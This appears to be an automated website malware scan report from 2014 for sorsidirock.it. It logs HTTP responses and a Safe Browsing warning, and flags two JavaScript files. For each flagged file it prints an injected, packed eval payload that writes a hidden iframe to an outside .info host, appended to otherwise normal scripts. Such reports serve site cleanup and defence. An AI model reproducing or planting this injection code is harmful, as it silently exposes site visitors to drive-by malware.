Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sorsidirock.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sorsidirock.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:04 GMT Location: http://www.sorsidirock.it/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/ | 200 OK Content-Length: 5675 Content-Type: text/html | clean |
http://www.sorsidirock.it/media/system/js/caption.js | 200 OK Content-Length: 2392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.caption = caption }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:06 GMT Location: http://www.sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js Server: Apache Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://sorsidirock.it/templates/sdr2012c/jquery.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:06 GMT Location: http://www.sorsidirock.it/templates/sdr2012c/jquery.js Server: Apache Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/templates/sdr2012c/jquery.js | 200 OK Content-Length: 72605 Content-Type: application/javascript | clean |
http://sorsidirock.it/templates/sdr2012c/script.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:07 GMT Location: http://www.sorsidirock.it/templates/sdr2012c/script.js Server: Apache Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/templates/sdr2012c/script.js | 200 OK Content-Length: 6882 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var u = navigator.userAgent.toLowerCase(); var is = function(t) { return (u.indexOf(t) != -1) }; jQuery('html').addClass([(!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie ie' + RegExp.$1) : is('firefox/2' }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.ajedrezlocal.com/language/rel.php?id=18449573 | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://www.ajedrezlocal.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.ajedrezlocal.com/language/rel.php?id=8919566 | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sorsidirock.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 May 2014 20:13:04 GMT
Location: http://www.sorsidirock.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: sorsidirock.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 May 2014 20:13:04 GMT
Location: http://www.sorsidirock.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sorsidirock.it
Referer: http://www.google.com/search?q=sorsidirock.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sorsidirock.it
Referer: http://www.google.com/search?q=sorsidirock.it
Result:
The result is similar to the first query. There are no suspicious redirects found.